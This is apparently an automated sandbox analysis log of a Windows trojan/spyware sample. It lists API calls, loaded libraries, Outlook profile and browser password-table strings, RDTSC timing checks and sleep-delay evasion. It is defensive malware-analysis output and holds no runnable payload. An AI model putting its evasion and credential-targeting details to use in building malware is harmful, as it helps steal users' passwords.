            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B13B085_2_37B13B08
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B163685_2_37B16368
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1A3515_2_37B1A351
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B163585_2_37B16358
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B17B4F5_2_37B17B4F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B15AB85_2_37B15AB8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B15AA85_2_37B15AA8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B152075_2_37B15207
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B152085_2_37B15208
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B132685_2_37B13268
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B129B85_2_37B129B8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1A9A05_2_37B1A9A0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B129A85_2_37B129A8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1F1385_2_37B1F138
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1F1295_2_37B1F129
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B121085_2_37B12108
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B148205_2_37B14820
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B148105_2_37B14810
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B170705_2_37B17070
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B170615_2_37B17061
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B118585_2_37B11858
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B100405_2_37B10040
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_3818E8A85_2_3818E8A8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_3818D6E85_2_3818D6E8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_381875E85_2_381875E8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: String function: 00402C41 appears 51 times
            Source: 4UQ5wnI389.exe, 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4UQ5wnI389.exe
            Source: 4UQ5wnI389.exe, 00000005.00000000.1931824375.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4UQ5wnI389.exe
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743372458.0000000034B47000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 4UQ5wnI389.exe
            Source: 4UQ5wnI389.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4UQ5wnI389.exe
            Source: 4UQ5wnI389.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeMutant created: NULL
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D9E.tmpJump to behavior
            Source: 4UQ5wnI389.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034DA5000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034DB3000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2745006696.0000000035CDD000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D95000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034DD4000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034DC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4UQ5wnI389.exeVirustotal: Detection: 75%
            Source: 4UQ5wnI389.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile read: C:\Users\user\Desktop\4UQ5wnI389.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4UQ5wnI389.exe "C:\Users\user\Desktop\4UQ5wnI389.exe"
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess created: C:\Users\user\Desktop\4UQ5wnI389.exe "C:\Users\user\Desktop\4UQ5wnI389.exe"
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess created: C:\Users\user\Desktop\4UQ5wnI389.exe "C:\Users\user\Desktop\4UQ5wnI389.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 4UQ5wnI389.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1940482380.0000000004709000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_70141B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70141B5F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_3_001949CC push eax; iretd 5_3_001949CD
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_0015ACA5 pushfd ; iretd 5_2_0015ACAA
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile created: C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeAPI/Special instruction interceptor: Address: 509F113
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeAPI/Special instruction interceptor: Address: 363F113
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeRDTSC instruction interceptor: First address: 506798D second address: 506798D instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 0000F2E3h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F3098534C93h 0x0000000a test ax, ax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeRDTSC instruction interceptor: First address: 360798D second address: 360798D instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 0000F2E3h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F30990EF6A3h 0x0000000a test ax, ax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeMemory allocated: 34CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeMemory allocated: 36CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598848Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598633Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598187Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597968Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597531Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596977Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596749Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596421Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596304Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596197Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596075Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595967Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595627Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595278Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeWindow / User API: threadDelayed 1638Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeWindow / User API: threadDelayed 8204Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeAPI coverage: 3.2 %
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -600000s >= -30000sJump to behavior
